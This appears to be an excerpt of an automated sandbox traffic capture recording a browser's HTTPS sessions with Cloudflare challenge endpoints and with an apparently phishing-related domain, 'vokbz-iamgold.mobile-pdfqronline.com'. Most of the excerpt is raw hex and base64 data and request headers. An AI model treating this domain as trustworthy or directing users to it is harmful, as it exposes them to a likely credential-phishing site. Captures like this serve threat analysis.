                                                                                                                                                2024-10-28 16:47:52 UTC1205INData Raw: 6a 6f 47 48 66 6f 71 54 53 33 31 63 68 70 61 51 68 70 69 4f 6c 5a 56 51 55 71 57 6f 5a 30 32 6c 6d 4a 36 56 6f 61 70 69 6c 4a 46 6e 6c 58 5a 68 6e 47 4e 34 58 72 61 70 72 36 61 79 75 33 4f 6c 6f 6e 6d 6d 68 33 4b 75 64 49 6e 47 75 62 2b 32 77 73 75 44 76 61 69 61 77 5a 32 4d 66 4a 70 2b 78 64 58 50 78 64 66 4e 31 4e 53 50 6b 59 6e 6c 64 59 79 4e 6a 6f 2f 6e 32 75 44 58 34 2b 79 6b 79 4d 48 45 30 71 75 63 75 70 37 7a 38 76 62 6e 76 6f 36 6c 70 71 65 6f 41 66 50 35 38 50 77 47 76 64 48 57 32 41 66 4b 74 64 4f 33 44 51 77 51 41 64 65 6e 76 72 2f 41 77 52 6f 4e 45 77 6f 57 48 39 59 45 2b 78 63 62 35 64 7a 32 2b 52 38 6a 4c 65 54 64 33 2f 4c 43 32 64 72 62 33 44 55 6f 4c 69 55 78 4f 76 45 66 46 7a 49 32 41 66 63 50 48 7a 73 63 51 41 62 34 2b 67 37 64 33 76 58
                                                                                                                                                Data Ascii: joGHfoqTS31chpaQhpiOlZVQUqWoZ02lmJ6VoapilJFnlXZhnGN4Xrapr6ayu3Olonmmh3KudInGub+2wsuDvaiawZ2MfJp+xdXPxdfN1NSPkYnldYyNjo/n2uDX4+ykyMHE0qucup7z8vbnvo6lpqeoAfP58PwGvdHW2AfKtdO3DQwQAdenvr/AwRoNEwoWH9YE+xcb5dz2+R8jLeTd3/LC2drb3DUoLiUxOvEfFzI2AfcPHzscQAb4+g7d3vX
                                                                                                                                                2024-10-28 16:47:52 UTC1369INData Raw: 41 62 77 2b 67 2f 35 31 2f 6b 45 4a 64 76 34 4a 77 63 49 42 77 41 65 2b 68 72 34 49 41 4c 2b 36 65 77 4d 2f 52 4c 33 4f 42 51 61 47 78 55 36 4b 7a 30 7a 48 78 51 62 52 44 73 68 4d 42 49 2f 47 30 6b 75 46 78 73 6b 4f 30 41 63 4e 44 55 6d 52 6a 4d 55 4d 68 4a 55 57 54 63 58 4d 45 38 77 47 6c 4e 59 59 7a 30 6f 58 47 68 45 5a 57 68 6d 5a 30 51 2b 4c 6c 4e 31 63 55 46 70 56 6e 4e 69 57 6b 74 37 62 55 6c 73 62 6e 68 59 66 31 53 41 63 49 4e 6a 66 6d 68 6e 58 45 4a 6a 67 47 4a 2b 6a 6d 6d 4b 5a 47 4b 52 6c 57 57 57 6a 32 5a 35 61 70 5a 75 58 4a 32 67 64 6d 4b 48 6d 4b 42 6f 6f 32 53 4e 71 59 68 39 72 4a 69 6e 69 4b 43 4d 6b 70 6d 53 75 71 6d 38 6a 71 36 66 69 62 4b 59 73 71 53 6c 6e 62 2b 45 69 4d 71 4b 76 61 76 4a 79 63 36 77 69 73 53 78 77 74 53 33 72 39 6a 62
                                                                                                                                                Data Ascii: Abw+g/51/kEJdv4JwcIBwAe+hr4IAL+6ewM/RL3OBQaGxU6Kz0zHxQbRDshMBI/G0kuFxskO0AcNDUmRjMUMhJUWTcXME8wGlNYYz0oXGhEZWhmZ0Q+LlN1cUFpVnNiWkt7bUlsbnhYf1SAcINjfmhnXEJjgGJ+jmmKZGKRlWWWj2Z5apZuXJ2gdmKHmKBoo2SNqYh9rJiniKCMkpmSuqm8jq6fibKYsqSlnb+EiMqKvavJyc6wisSxwtS3r9jb
                                                                                                                                                2024-10-28 16:47:52 UTC1369INData Raw: 6f 50 45 51 49 45 39 77 4d 48 4a 2f 6f 6f 39 77 55 76 4c 68 4c 6f 4d 4f 38 6c 43 77 6e 78 44 69 51 7a 42 6a 6f 4c 4f 76 63 4f 2b 78 59 54 52 6b 51 44 48 43 41 56 42 53 67 7a 49 45 6f 63 50 69 73 74 52 77 77 67 4e 52 67 71 51 45 34 6d 56 6c 63 63 47 6c 4d 36 59 6c 42 47 57 6b 56 64 49 31 64 4a 58 43 73 6f 54 6b 74 6a 52 46 42 4a 4b 57 6b 76 64 6d 4e 31 63 56 70 78 62 48 56 6d 64 33 4a 35 58 6e 46 37 59 6c 39 6e 69 56 79 45 52 48 52 48 68 59 35 50 63 45 31 68 68 58 2b 44 6a 57 78 37 6b 56 46 61 63 6e 53 57 65 49 42 63 62 6d 4b 61 6f 61 53 72 61 6f 68 31 71 47 5a 71 65 62 47 53 70 49 43 56 74 33 4b 4d 64 34 65 74 63 62 6c 32 76 58 32 52 73 4d 47 31 67 72 2f 46 67 37 44 4c 77 63 48 4b 6a 5a 36 6c 73 62 2b 6c 72 38 32 6c 30 38 79 72 74 71 32 7a 78 71 6a 4f 6e
                                                                                                                                                Data Ascii: oPEQIE9wMHJ/oo9wUvLhLoMO8lCwnxDiQzBjoLOvcO+xYTRkQDHCAVBSgzIEocPistRwwgNRgqQE4mVlccGlM6YlBGWkVdI1dJXCsoTktjRFBJKWkvdmN1cVpxbHVmd3J5XnF7Yl9niVyERHRHhY5PcE1hhX+DjWx7kVFacnSWeIBcbmKaoaSraoh1qGZqebGSpICVt3KMd4etcbl2vX2RsMG1gr/Fg7DLwcHKjZ6lsb+lr82l08yrtq2zxqjOn
                                                                                                                                                2024-10-28 16:47:52 UTC197INData Raw: 66 34 4e 72 74 76 64 54 56 31 74 66 59 32 64 72 62 4f 73 66 65 33 2b 44 68 51 50 37 4f 7a 39 44 6e 36 4f 6e 71 51 7a 59 38 4d 7a 39 49 41 45 59 35 53 53 70 41 52 54 35 4a 55 46 41 46 51 31 64 51 53 6c 52 49 4f 46 52 52 54 46 59 56 59 56 52 61 55 56 31 6d 48 6c 42 56 57 56 4e 59 58 6d 4e 58 61 47 70 76 4b 6d 42 6d 61 30 46 78 61 30 68 38 64 57 39 35 67 56 4a 34 66 33 46 2f 68 48 42 38 4f 6b 30 64 6b 56 41 67 49 59 46 2f 4f 6b 4f 54 68 6f 79 44 6a 35 68 51 64 47 31 77 66 6c 64 52 53 61 55 31 54 45 31 4f 54 36 65 61 6f 4a 65 6a 72 47 53 65 69 58 75 69 66 6d 31 6c 5a 33 70 4b 76 67 3d 3d
                                                                                                                                                Data Ascii: f4NrtvdTV1tfY2drbOsfe3+DhQP7Oz9Dn6OnqQzY8Mz9IAEY5SSpART5JUFAFQ1dQSlRIOFRRTFYVYVRaUV1mHlBVWVNYXmNXaGpvKmBma0Fxa0h8dW95gVJ4f3F/hHB8Ok0dkVAgIYF/OkOThoyDj5hQdG1wfldRSaU1TE1OT6eaoJejrGSeiXuifm1lZ3pKvg==


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                29192.168.2.1649755104.18.95.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:53 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/736896047:1730132405:5SGzvlJZj4ad9Fw5YQ-DPoYWF7p9UG71nocFwUBA5ZI/8d9c68ac0f68e79a/_gFYOdWvOno18EFRhpnXawTigdcRjwUS3i.fqCCsr9g-1730134058-1.1.1.1-cLx_S1QbgF9.LxN6AtmEfd6QgduHNIg5gmCjicGVJiRTT3MnfZL.NQSkb4wRylmA HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:53 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:53 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                cf-chl-out: sI+TF4xC78AIF5PwIOGc/ONL/DNFMtKCyQY=$MqrAa3wXwSvWkF1i
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c69083a7c4665-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                2024-10-28 16:47:53 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                30192.168.2.1649757188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:54 UTC1349OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/244223768:1730132189:NbzFRZvTcBmmYjVsO5xy0JykfjjXCxNv2Vd8K9KmlQk/8d9c6884aac83168/.dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 6418
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                CF-Challenge: .dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Origin: https://vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:54 UTC6418OUTData Raw: 76 5f 38 64 39 63 36 38 38 34 61 61 63 38 33 31 36 38 3d 61 53 30 44 65 4b 63 68 59 7a 30 63 53 50 58 5a 62 63 65 57 4e 56 7a 63 48 57 4f 44 61 6e 7a 6a 57 76 57 6e 62 30 56 68 57 4f 57 5a 4d 6e 63 58 6e 57 24 7a 57 33 47 63 6a 63 4e 57 78 77 37 47 7a 4a 57 2d 4d 42 78 44 57 56 44 4b 72 57 37 70 57 5a 72 25 32 62 7a 44 7a 58 37 51 57 64 53 63 45 62 6e 63 72 48 57 36 47 63 42 57 69 47 4e 58 57 4a 44 2d 58 63 6b 57 44 63 37 57 31 4d 34 33 68 68 4b 57 63 2d 68 73 57 68 43 44 57 79 7a 75 36 30 57 79 57 57 39 4b 5a 63 37 46 57 57 66 57 69 42 4d 57 63 36 4a 69 44 5a 52 57 36 59 57 46 5a 31 41 30 44 44 57 6d 44 63 2b 6d 57 4b 4d 50 36 63 44 58 48 50 2d 58 68 47 57 73 4d 54 52 4b 70 69 6e 72 37 42 58 73 66 30 37 36 31 24 78 57 57 47 57 51 4b 59 67 6b 51 45 67 4d
                                                                                                                                                Data Ascii: v_8d9c6884aac83168=aS0DeKchYz0cSPXZbceWNVzcHWODanzjWvWnb0VhWOWZMncXnW$zW3GcjcNWxw7GzJW-MBxDWVDKrW7pWZr%2bzDzX7QWdScEbncrHW6GcBWiGNXWJD-XckWDc7W1M43hhKWc-hsWhCDWyzu60WyWW9KZc7FWWfWiBMWc6JiDZRW6YWFZ1A0DDWmDc+mWKMP6cDXHP-XhGWsMTRKpinr7BXsf0761$xWWGWQKYgkQEgM
                                                                                                                                                2024-10-28 16:47:54 UTC1340INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:54 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Content-Length: 4020
                                                                                                                                                Connection: close
                                                                                                                                                set-cookie: cf_chl_rc_m=;Expires=Sun, 27 Oct 2024 16:47:54 GMT;SameSite=Strict
                                                                                                                                                cf-chl-out-s: 97otBz4p1nqDOfrmm1An6WTsNGUHpOwUTyiaiMlsdEkFFNKy54x5vBeeS3w0nEsdJc9ABueMFe0A+S/pc1qOZGOfHo1s+aJThf3Kd7vhW/U/kQ9y6RooMp2fRhyEcaQzQzVI6NxpSFvyxf0Fvyxb+WA1G7emN4DqbCEAX1DMXIya8HkOYuUMN5esuIA5NXuEokxsp3hP1k6RSUWJoVSfFv+/nXhDBKVk1Lr/vCjwyemtFUu94l9he0f+yh4h4AEtx0EzGEEoTEzSGIBrMEC1FWivZ/LIt1r5XibBAcBEdKmOHo+JI2sw4u+JEE3w0xzpWLEB9s7xqWxiIhYvGqYZL9Gu7WPthD+qp6fwvxBMbQUf7eygH0Ylm3MVTvOYJkEAJvGV/Yo2rntRr3nNERiYQ7UlIdYBXl8LSNlDCNe2gRXUS4g7tBMXlgVU+dRwoQ/nzN5wBMytwnmENCxv+wn9eyhtbzo4rCxnIlOdmGgB2mrEr5l6U33B5pBDb2JowMC+obP2tSIoymV8KSMec3SdKDEJ0YXbcHEVtWJtCD9reaLaAdNtGECO0jXFIkpmziEdX8HcYTRp7lVfu+RsCak2BKeFujULSoHC44gLAw+tou6S7IvTBqnRKidnJCgNfZkcl6j9Ms4aSdg3ewnt4QE2kURkMvd3uYL/P2S5gRjL5X2/z9wfThfj5EO8WOWmew+dTU4JrEeYrAB0n2zIM567tW2Dzm7kTXxqwRnk7rLt2TqiaBlUUJ32Ny08SuKdaVil7F5aYBkI65PUoELcaBTQHpu7IfBgZRJP+MLY+NUlXdCQcLw/6lKUO9xUHE2WUVBY9t7QbhF3XUuP3TMCi8TGqLB8wqINOFLdMpHlAYF7x9eMD1V8q/IH6WmRECODuFiMoOW+9YqBmqQwllLTW9SHs6NAJCcR+mVBnVHzfmIVvk1RB8M/GkROKlhSKLXvNWqbRDF/o61PCRkjMH0Q+XUOrp6vJDaXcZhrL5AuEyhm+Ck6HPrGSX [TRUNCATED]
                                                                                                                                                2024-10-28 16:47:54 UTC754INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 62 50 71 61 61 53 58 6c 5a 72 36 4f 77 63 46 73 41 2f 71 6a 33 58 4a 65 68 4d 49 68 4c 30 53 32 6a 75 78 71 32 57 78 73 6b 53 6c 37 51 56 51 45 4e 65 2f 77 32 47 6f 57 64 38 41 64 45 4f 57 50 73 53 6a 32 54 4c 6d 68 4d 76 41 55 58 74 6b 2b 38 44 64 4b 2b 4f 55 7a 39 76 2f 62 24 75 32 71 75 2f 4f 4a 6d 53 34 7a 64 69 2f 78 42 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 36 65 4e 30 45 4b 48 4b 6f 4b 34 51 73 7a 73 50 33 44 52 78 61 4e 6b 64 64 70 34 4d 70 71 55 75 48 32 33 75 47 6b 50 65 50 42 71 53 39 64 25 32 42 44 56 6b 65 38
                                                                                                                                                Data Ascii: cf-chl-out: bPqaaSXlZr6OwcFsA/qj3XJehMIhL0S2juxq2WxskSl7QVQENe/w2GoWd8AdEOWPsSj2TLmhMvAUXtk+8DdK+OUz9v/b$u2qu/OJmS4zdi/xBReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6eN0EKHKoK4QszsP3DRxaNkddp4MpqUuH23uGkPePBqS9d%2BDVke8
                                                                                                                                                2024-10-28 16:47:54 UTC644INData Raw: 6b 34 61 4d 67 34 2b 59 55 49 4a 68 69 35 75 56 69 35 32 54 6d 70 70 56 56 36 71 74 62 46 4b 71 6e 61 4f 61 70 71 39 6e 6d 5a 5a 73 6d 6e 74 6d 6f 57 68 39 59 37 75 75 74 4b 75 33 77 48 69 71 70 33 36 72 6a 48 65 7a 65 59 36 36 79 73 53 36 7a 4d 4c 4a 79 58 7a 45 77 39 4f 79 78 74 62 56 33 61 6a 56 31 74 50 53 7a 37 6e 4e 32 74 4f 58 6d 5a 48 74 66 5a 53 56 6c 70 66 72 38 4f 50 76 33 2b 57 65 70 2f 66 71 38 4f 66 7a 2f 4f 47 75 35 2b 7a 77 36 75 2f 31 2b 75 34 41 41 67 65 36 38 66 43 39 2b 75 77 54 43 77 48 44 2b 73 65 2f 48 4b 76 43 77 38 54 46 78 73 66 49 79 51 34 4e 49 42 50 4f 31 68 6f 67 4a 78 6b 6e 46 78 6f 73 49 6a 41 67 34 76 62 48 33 74 2f 67 34 65 4c 6a 35 4f 58 6d 35 2b 6a 70 50 54 46 42 51 30 45 2b 38 50 67 32 4f 6a 51 35 50 30 51 34 54 44 34
                                                                                                                                                Data Ascii: k4aMg4+YUIJhi5uVi52TmppVV6qtbFKqnaOapq9nmZZsmntmoWh9Y7uutKu3wHiqp36rjHezeY66ysS6zMLJyXzEw9OyxtbV3ajV1tPSz7nN2tOXmZHtfZSVlpfr8OPv3+Wep/fq8Ofz/OGu5+zw6u/1+u4AAge68fC9+uwTCwHD+se/HKvCw8TFxsfIyQ4NIBPO1hogJxknFxosIjAg4vbH3t/g4eLj5OXm5+jpPTFBQ0E+8Pg2OjQ5P0Q4TD4
                                                                                                                                                2024-10-28 16:47:54 UTC1369INData Raw: 62 32 4e 77 61 53 34 6d 67 68 49 70 4b 69 73 73 67 32 2b 42 4d 48 53 42 67 6e 39 2b 65 32 71 4d 69 7a 70 59 50 49 74 2f 6a 49 56 42 54 55 4e 4c 59 6d 46 48 64 59 71 69 57 47 32 55 6b 32 78 64 61 6d 74 73 62 57 35 76 63 48 46 67 64 55 56 47 58 56 35 66 59 4b 71 6f 59 32 78 50 5a 6d 64 6f 61 57 70 72 62 47 31 76 78 72 6d 2f 74 73 4c 4c 67 37 43 6f 77 38 65 53 69 61 4b 75 70 61 54 4c 6b 34 71 4b 78 39 54 56 30 74 48 4f 33 5a 6a 66 30 74 48 6b 34 74 61 66 34 39 58 6e 36 75 44 73 34 75 6e 70 34 65 47 6c 71 4b 43 6e 71 49 32 6b 70 61 61 6e 71 4b 6d 71 71 37 54 78 2f 66 49 47 2f 76 63 43 43 63 4d 44 42 2f 76 36 44 77 55 4d 44 4d 77 51 45 78 45 58 45 77 67 56 45 38 66 6c 35 75 66 4c 30 78 59 6a 4a 43 45 6c 37 4e 72 55 4d 6a 50 58 34 44 45 6b 4b 69 45 74 4e 75 30
                                                                                                                                                Data Ascii: b2NwaS4mghIpKissg2+BMHSBgn9+e2qMizpYPIt/jIVBTUNLYmFHdYqiWG2Uk2xdamtsbW5vcHFgdUVGXV5fYKqoY2xPZmdoaWprbG1vxrm/tsLLg7Cow8eSiaKupaTLk4qKx9TV0tHO3Zjf0tHk4taf49Xn6uDs4unp4eGlqKCnqI2kpaanqKmqq7Tx/fIG/vcCCcMDB/v6DwUMDMwQExEXEwgVE8fl5ufL0xYjJCEl7NrUMjPX4DEkKiEtNu0
                                                                                                                                                2024-10-28 16:47:54 UTC1369INData Raw: 48 78 39 66 48 52 75 67 6f 4a 30 4f 44 69 47 6a 49 52 36 50 55 4d 34 51 49 4b 45 67 49 47 44 6a 55 64 4b 58 53 31 45 52 55 5a 48 53 45 6c 4b 53 35 6d 53 6f 70 43 55 6b 71 61 55 68 70 71 6d 6f 35 6d 79 66 70 79 77 6e 6f 4f 72 62 72 53 6e 74 34 57 35 75 72 6d 78 71 37 2b 2f 73 58 56 31 76 62 47 2b 74 33 71 41 64 58 32 4d 69 34 6d 51 69 35 4b 56 6b 35 57 56 6b 70 58 48 79 73 6a 4a 6f 4d 37 4b 6d 35 33 50 30 36 43 66 6f 39 4f 6a 31 39 57 73 32 39 71 72 72 4c 48 64 73 62 43 77 34 65 48 6a 74 65 62 70 36 4f 76 41 75 37 32 2b 76 63 58 77 37 38 6a 43 79 76 50 34 39 76 6e 48 76 73 48 55 70 4c 75 38 76 62 36 2f 77 4d 48 43 45 51 6f 61 43 41 77 4b 48 67 7a 39 45 68 34 62 45 53 72 31 46 43 67 57 2b 69 50 6c 4c 42 38 76 2f 44 45 79 4d 53 6b 6a 4e 7a 63 70 37 4f 77 39
                                                                                                                                                Data Ascii: Hx9fHRugoJ0ODiGjIR6PUM4QIKEgIGDjUdKXS1ERUZHSElKS5mSopCUkqaUhpqmo5myfpywnoOrbrSnt4W5urmxq7+/sXV1vbG+t3qAdX2Mi4mQi5KVk5WVkpXHysjJoM7Km53P06Cfo9Oj19Ws29qrrLHdsbCw4eHjtebp6OvAu72+vcXw78jCyvP49vnHvsHUpLu8vb6/wMHCEQoaCAwKHgz9Eh4bESr1FCgW+iPlLB8v/DEyMSkjNzcp7Ow9
                                                                                                                                                2024-10-28 16:47:54 UTC638INData Raw: 52 75 63 33 6c 2b 63 6f 4f 46 69 6b 57 4e 65 6d 31 74 52 54 32 5a 4b 55 42 42 51 6b 4e 45 52 55 5a 48 53 45 6c 4b 53 7a 59 33 54 6b 39 51 55 56 4a 54 56 46 56 57 56 31 68 5a 6f 4b 71 75 71 6f 4f 72 62 71 4b 6c 74 36 32 30 74 47 65 46 61 62 61 36 72 36 37 43 75 4c 2b 2f 67 4d 4f 31 79 62 37 46 75 63 61 2f 65 34 64 39 31 63 6a 4f 78 64 48 61 6b 73 54 4a 7a 63 66 4d 30 74 66 4c 33 4e 37 6a 6e 74 54 42 32 73 6e 47 36 39 7a 71 38 72 57 46 68 70 32 65 6e 36 43 68 6f 71 4f 6b 70 61 61 6e 71 50 48 7a 2f 67 48 38 41 51 6d 2b 42 50 63 45 41 66 62 35 2f 4f 73 4f 2b 78 41 43 78 51 30 56 44 51 37 4f 77 78 4d 62 45 78 54 55 79 53 49 56 47 78 49 65 4a 39 34 52 46 68 6f 55 47 52 38 6b 47 43 6b 72 4d 4f 6f 68 46 42 41 4f 42 68 63 76 35 50 44 6d 50 7a 49 34 4c 7a 74 45 2b
                                                                                                                                                Data Ascii: Ruc3l+coOFikWNem1tRT2ZKUBBQkNERUZHSElKSzY3Tk9QUVJTVFVWV1hZoKquqoOrbqKlt620tGeFaba6r67CuL+/gMO1yb7Fuca/e4d91cjOxdHaksTJzcfM0tfL3N7jntTB2snG69zq8rWFhp2en6ChoqOkpaanqPHz/gH8AQm+BPcEAfb5/OsO+xACxQ0VDQ7OwxMbExTUySIVGxIeJ94RFhoUGR8kGCkrMOohFBAOBhcv5PDmPzI4LztE+


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                31192.168.2.1649758188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:55 UTC609OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/244223768:1730132189:NbzFRZvTcBmmYjVsO5xy0JykfjjXCxNv2Vd8K9KmlQk/8d9c6884aac83168/.dA4utKOCXqNXZ7ka1Dy8Dmaet_UVdAWtZsXKlq57e4-1730134052-1.2.1.1-YB_bFKSHTRqrgWaOlj1EXOYaZKAO68GetFMt5G0UvZHFFnkZOi74rI0vPm2dKjee HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:55 UTC929INHTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:55 GMT
                                                                                                                                                Content-Type: application/json
                                                                                                                                                Content-Length: 7
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                cf-chl-out: UDIn7ikZihOj2df+M37y3cLfmSD6GaB0OBs=$AbjgofpSYMcjNqV1
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wkjr9bhACmWCdQsb5KgILKYa7Sic9lFafA3%2Fe2UarypavvCSB%2FwHZf5JuwMPHzNq7qlETp3KSmsFWTZoGmq69ocVLjMRxIjOC%2FLtsOsPb9cOg1SHZ%2BSSrL%2B4dRscMJwIrVNfU8iANNVzpjhm%2FKR6fphj4%2FmQxEE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c6911ef233464-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1262&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2859&recv_bytes=1187&delivery_rate=2280314&cwnd=249&unsent_bytes=0&cid=e1310f6dbd044733&ts=156&x=0"
                                                                                                                                                2024-10-28 16:47:55 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                Data Ascii: invalid


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                32192.168.2.1649761188.114.97.34436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:55 UTC1297OUTPOST /11384/ HTTP/1.1
                                                                                                                                                Host: vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Content-Length: 6146
                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.132"
                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                                                Origin: https://vokbz-iamgold.mobile-pdfqronline.com
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                                                Sec-Fetch-User: ?1
                                                                                                                                                Sec-Fetch-Dest: document
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/11384/?__cf_chl_tk=RfTckejA3IsTnmGx2hMxZW0at9qomI1KvAylxSBhkEw-1730134052-1.0.1.1-oWnDs99zxb7jkIe_.4yR5kObhB4Q3c5Vmnk_QRJ_VXc
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
